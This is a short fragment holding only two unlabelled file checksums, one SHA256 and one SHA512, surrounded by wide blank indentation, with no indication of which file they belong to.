                                                                                                                                          SHA256

                                                                                                                                          056ae301d1686bbf2355fd96ef3363e2b18d593f58f912498d87de3569fa9028

                                                                                                                                          SHA512

                                                                                                                                          6250481712b51d19e13bf148e3cb046fbf669398b06f8ce757a8583a0fec36ca22140cb90d4706a731f27d1419795ff37ec079d170e15e9e2985020c1e6a1d5b